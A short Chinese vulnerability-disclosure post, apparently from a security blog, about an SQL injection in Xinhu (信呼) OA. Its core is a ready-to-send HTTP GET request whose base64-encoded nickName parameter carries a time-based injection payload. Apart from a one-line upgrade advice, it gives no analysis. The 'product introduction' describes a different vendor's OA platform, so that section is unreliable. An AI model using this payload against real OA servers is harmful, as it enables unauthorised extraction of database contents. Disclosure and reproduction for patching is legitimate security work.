漏洞披露-信呼-OA

更多网安漏洞复现,可前往无问社区查看http://wwlib.cn/index.php/artread/artid/16564.html

0x01 产品简介

泛微数字化运营管理平台OA为组织提供从"可信数字身份、电子化流程审批、个性化岗位信息门户、 知识文档管理、电子化签署到内外协同的业务管理"

0x02 漏洞概述

信呼OA办公系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

建议升级到最新版本已修复

0x03 复现环境

payload:

复制代码
GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
相关推荐
go_to_hacker25 分钟前
AI进行全自动渗透
网络·web安全·网络安全·渗透测试·代码审计
我有医保我先冲44 分钟前
SQL复杂查询与性能优化全攻略
数据库·sql·性能优化
烧瓶里的西瓜皮1 小时前
Go语言从零构建SQL数据库引擎(2)
数据库·sql·golang
Alt.92 小时前
MyBatis基础五(动态SQL,缓存)
java·sql·mybatis
金丝猴也是猿4 小时前
如何在Flutter上实现高性能的动态模板渲染
websocket·网络协议·tcp/ip·http·网络安全·https·udp
swift开发pk OC开发4 小时前
Flutter性能优化细节
websocket·网络协议·tcp/ip·http·网络安全·https·udp
网络抓包与爬虫4 小时前
Flutter 环境搭建、常用指令、开发细节
websocket·网络协议·tcp/ip·http·网络安全·https·udp
半路_出家ren4 小时前
网络安全设备介绍:防火墙、堡垒机、入侵检测、入侵防御
安全·网络安全·负载均衡·堡垒机·防火墙·网络安全设备·上网行为管理
予安灵4 小时前
《白帽子讲 Web 安全》之服务端请求伪造(SSRF)深度剖析:从攻击到防御
前端·安全·web安全·网络安全·安全威胁分析·ssrf·服务端请求伪造
ccc_9wy5 小时前
玄机-第六章 流量特征分析-常见攻击事件 tomcat的测试报告
网络安全·tomcat·玄机靶场·攻击流程·溯源分析·定时任务反弹shell·gobuster